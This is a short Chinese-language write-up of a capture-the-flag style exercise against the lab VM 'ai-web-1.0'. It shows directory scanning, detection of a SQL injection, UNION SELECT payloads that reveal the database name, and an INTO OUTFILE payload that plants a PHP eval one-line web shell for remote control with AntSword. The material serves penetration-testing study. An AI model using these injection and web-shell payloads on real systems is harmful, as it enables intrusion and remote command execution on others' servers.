1.环境
虚拟机:kali
靶机:ai-web-1.0
2.获取靶机ip

确认靶机ip为192.168.13.160

3.获取绝对路径
用御剑扫描发现两个路径

http://192.168.13.160/robots. txt和http://192.168.13.160/index.html

发现一些路径
用kali的dirb扫描发现一个info.php文件

浏览器访问

获得了网站的绝对路径
4.判断是否存在注入
用dirb扫描另一个路径

发现一个index.php文件,浏览器访问

页面显示提交框,猜测存在sql注入
输入框输入1提交,页面正常,出现回显

输入框输入1'提交,发现报sql语句错,存在sql注入漏洞

5.获取数据库名
使用burpsuite抓包,得到注入点位置。输入1提交抓包

判断列数
' order by 3#

4时出错所以为3列

说明此数据库有三列,下面确定回显位
' union select 1,2,3#

然后获取数据库名称
' union select 1,database(),3#
该数据库名称为 aiweb1
之后sql注入流程,后面可以查询表名,字段名,用户数据等信息。
6.一句话木马上传文件
由于这个网站页面没有登陆框,获取不到用户登陆信息,所以查询数据库数据没有用。
-1' union select 1,<?php @eval($_POST["cmd"]);?>,3 into outfile '/home/www/html/web1x44329002sdf92213/se3reTdir777/uploads/2.php'#
上传成功后路径打开2.php蚁剑连接成功我的找不到路径